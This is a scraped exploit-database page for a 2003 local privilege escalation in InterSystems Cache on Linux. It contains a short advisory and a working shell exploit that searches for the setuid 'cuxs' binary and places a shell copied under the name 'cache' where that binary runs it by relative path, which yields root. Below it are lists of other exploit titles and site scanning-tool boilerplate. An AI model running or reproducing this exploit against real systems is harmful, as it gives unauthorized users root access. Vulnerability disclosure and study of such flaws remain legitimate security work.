"InterSystems Cache 4.1.15/5.0.x - Insecure Default Permissions"

Author

Exploit author

"Larry W. Cashdollar"

Platform

Exploit platform

linux

Release date

Exploit published date

2003-07-01

                
                    
                         Download file
                    
                
            
source: https://www.securityfocus.com/bid/8070/info

It has been reported that the permissions set by default on the files and directories comprising InterSystems Cache are insecure. The permissions on directories allegedly allow for any user to overwrite any file. This creates many opportunities for local attackers to obtain root privileges.

#!/bin/sh
# kokaninATdtors playing with 5.0.2.607.1_linux_su.tar (cache) on leenooks.
# this started as an exploit for scenario1 in
# http://www.idefense.com/advisory/07.01.03.txt, but ended up as something else
# A snippetisnip from an strace of the cuxs binary shows:
# execve("../bin/cache", ["cache"], [/* 19 vars */])
# -------^^^^^^^^^^^^^^------- which is stupid stupid stupid since cuxs is +s

TARGET=`find / -type f -name cuxs -perm -4000 2>/dev/null`
mkdir -p crapche/bin
cd crapche/bin
cp `which ash` cache
$TARGET

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-11-27	"libupnp 1.6.18 - Stack-based buffer overflow (DoS)"	dos	linux	"Patrik Lantz"
2020-11-24	"ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)"	webapps	linux	"Giuseppe Fuggiano"
2020-10-28	"aptdaemon < 1.1.1 - File Existence Disclosure"	local	linux	"Vaisha Bernard"
2020-10-28	"Blueman < 2.1.4 - Local Privilege Escalation"	local	linux	"Vaisha Bernard"
2020-10-28	"Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion"	webapps	linux	"Ivo Palazzolo"
2020-10-28	"PackageKit < 1.1.13 - File Existence Disclosure"	local	linux	"Vaisha Bernard"
2020-09-11	"Gnome Fonts Viewer 3.34.0 - Heap Corruption"	local	linux	"Cody Winkler"
2020-07-10	"Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution"	remote	linux	SpicyItalian
2020-07-06	"Grafana 7.0.1 - Denial of Service (PoC)"	dos	linux	mostwanted002

Release Date	Title	Type	Platform	Author
2019-01-16	"Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit"	webapps	php	"Larry W. Cashdollar"
2018-10-11	"jQuery-File-Upload 9.22.0 - Arbitrary File Upload"	webapps	php	"Larry W. Cashdollar"
2018-09-18	"WordPress Plugin Arigato Autoresponder and Newsletter 2.5 - Blind SQL Injection / Reflected Cross-Site Scripting"	webapps	php	"Larry W. Cashdollar"
2018-04-23	"Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure"	webapps	php	"Larry W. Cashdollar"
2017-08-31	"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection"	webapps	php	"Larry W. Cashdollar"
2017-08-31	"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection"	webapps	php	"Larry W. Cashdollar"
2017-08-31	"Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection"	webapps	php	"Larry W. Cashdollar"
2016-09-22	"Joomla! Component com_videogallerylite 1.0.9 - SQL Injection"	webapps	php	"Larry W. Cashdollar"
2016-09-16	"Joomla! Component Catalog 1.0.7 - SQL Injection"	webapps	php	"Larry W. Cashdollar"
2016-09-16	"Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection"	webapps	php	"Larry W. Cashdollar"
2015-12-30	"DeleGate 9.9.13 - Local Privilege Escalation"	local	linux	"Larry W. Cashdollar"
2015-08-10	"WordPress Plugin WPTF Image Gallery 1.03 - Arbitrary File Download"	webapps	php	"Larry W. Cashdollar"
2015-08-10	"WordPress Plugin Candidate Application Form 1.0 - Arbitrary File Download"	webapps	php	"Larry W. Cashdollar"
2015-08-10	"WordPress Plugin Simple Image Manipulator 1.0 - Arbitrary File Download"	webapps	php	"Larry W. Cashdollar"
2015-08-10	"WordPress Plugin Recent Backups 0.7 - Arbitrary File Download"	webapps	php	"Larry W. Cashdollar"
2015-07-13	"WordPress Plugin Swim Team 1.44.10777 - Arbitrary File Download"	webapps	php	"Larry W. Cashdollar"
2015-07-08	"WordPress Plugin WP E-Commerce Shop Styling 2.5 - Arbitrary File Download"	webapps	php	"Larry W. Cashdollar"
2015-07-08	"WordPress Plugin Easy2Map 1.24 - SQL Injection"	webapps	php	"Larry W. Cashdollar"
2015-06-12	"WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal"	webapps	php	"Larry W. Cashdollar"
2015-06-12	"WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload"	webapps	php	"Larry W. Cashdollar"
2015-04-02	"WordPress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload"	webapps	php	"Larry W. Cashdollar"
2015-04-02	"WordPress Plugin VideoWhisper Video Presentation 3.31.17 - Arbitrary File Upload"	webapps	php	"Larry W. Cashdollar"
2014-11-10	"WordPress Plugin / Joomla! Component XCloner - Multiple Vulnerabilities"	webapps	php	"Larry W. Cashdollar"
2013-07-09	"Solaris Recommended Patch Cluster 6/19 (x86) - Local Privilege Escalation"	local	linux_x86	"Larry W. Cashdollar"
2013-03-12	"RubyGems fastreader - 'entry_controller.rb' Remote Command Execution"	remote	multiple	"Larry W. Cashdollar"
2013-02-05	"Oracle Automated Service Manager 1.3 - Installation Privilege Escalation"	local	linux	"Larry W. Cashdollar"
2012-12-09	"Centrify Deployment Manager 2.1.0.283 - Local Privilege Escalation"	local	linux	"Larry W. Cashdollar"
2010-03-24	"Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities"	local	solaris	"Larry W. Cashdollar"
2003-07-01	"InterSystems Cache 4.1.15/5.0.x - Insecure Default Permissions"	local	linux	"Larry W. Cashdollar"
2003-04-23	"SAP Database 7.3/7.4 - SDBINST Race Condition"	local	linux	"Larry W. Cashdollar"

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"InterSystems Cache 4.1.15/5.0.x - Insecure Default Permissions"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.